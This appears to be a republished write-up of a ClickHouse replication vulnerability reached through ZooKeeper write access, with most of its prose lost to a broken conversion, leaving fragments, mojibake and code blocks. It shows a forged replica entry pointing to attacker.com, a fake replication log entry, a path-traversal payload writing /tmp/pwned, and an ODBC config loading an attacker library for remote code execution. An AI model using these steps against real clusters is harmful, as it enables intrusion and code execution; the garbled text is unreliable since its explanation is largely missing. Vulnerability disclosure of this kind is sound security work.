Clever Geek Handbook

Why keep zoo cages closed



This article will be a story about one very common vulnerability in the ClickHouse replication protocol, and it will also show how you can expand the attack plane.



ClickHouse β€” , . ClickHouse Apache ZooKeeper (ZK) .



ZK , ZK , Kafka, Hadoop, ClickHouse .



ZooKeeper

0day Java , , ZooKeeper, ClickHouse.



ClickHouse DDL, ZK β€” /clickhouse/task_queue/ddl.



/clickhouse/task_queue/ddl/query-0001 :



version: 1
query: DROP TABLE xxx ON CLUSTER test;
hosts: ['host1:9000', 'host2:9000']


host1 host2 test . DDL CREATE/ALTER/DROP.



? ?



ClickHouse , ZK , . (ZK , chXX β€” , foobar β€” ):



CREATE TABLE foobar
(
    `action_id` UInt32 DEFAULT toUInt32(0),
    `status` String
)
ENGINE=ReplicatedMergeTree(
'/clickhouse/tables/01-01/foobar/', 'chXX')
ORDER BY action_id;


columns metadata.



/clickhouse/tables/01/foobar/replicas/chXX/hosts:



host: chXX-address
port: 9009
tcp_port: 9000
database: default
table: foobar
scheme: http


? , (TCP/9009) chXX-address firewall . ?



ZK, /clickhouse/tables/01-01/foobar/replicas/chXX host.



/clickhouse/tables/01–01/foobar/replicas/attacker/host:



host: attacker.com
port: 9009
tcp_port: 9000
database: default
table: foobar
scheme: http


, , β€” ZK /clickhouse/tables/01-01/foobar/log/log-00000000XX (XX , , ):



format version: 4
create_time: 2019-07-31 09:37:42
source replica: attacker
block_id: all_7192349136365807998_13893666115934954449
get
all_0_0_2


source_replica β€” , , block_id β€” , get β€” "get block" ( ).



, , ( , HTTP). attacker.com :



POST /?endpoint=DataPartsExchange:/clickhouse/tables/01-01/default/foobar/replicas/chXX&part=all_0_0_2&compress=false HTTP/1.1
Host: attacker.com
Authorization: XXX


XXX β€” . ClickHouse HTTP. , , ZooKeeper, , .



, , .







, , , , . , .



/var/lib/clickhouse ( - ):



flags β€” , ;

tmp β€” ;

user_files β€” (INTO OUTFILE );

metadata β€” sql ;

preprocessed_configs β€” /etc/clickhouse-server;

data β€” , ( /var/lib/clickhouse/data/default).



. β€” . foobar, , :



action_id.bin
action_id.mrk2
checksums.txt
columns.txt
count.txt
primary.idx
status.bin
status.mrk2


- .



file_name WriteBufferFromFile. , clickhouse. , , ( ):



\x01
\x00\x00\x00\x00\x00\x00\x00\x24
../../../../../../../../../tmp/pwned
\x12\x00\x00\x00\x00\x00\x00\x00
hellofromzookeeper


../../../../../../../../../tmp/pwned /tmp/pwned hellofromzookeeper.



(RCE).



RCE



ClickHouse clickhouse -. XML, , /var/lib/clickhouse/preprocessed_configs. . /etc/clickhouse-server , . ClickHouse -, β€” . ClickHouse, , root.



ODBC RCE



clickhouse, /nonexistent. , , /nonexistent clickhouse (! . ).



ClickHouse ODBC . ODBC (.so). ClickHouse , odbc-bridge, . , , ?



~/.odbc.ini :



[lalala]
Driver=/var/lib/clickhouse/user_files/test.so


SELECT * FROM odbc('DSN=lalala', 'test', 'test'); test.so RCE ( buglloc ).



ClickHouse 19.14.3. ClickHouse ZooKeepers!



More articles:


All Articles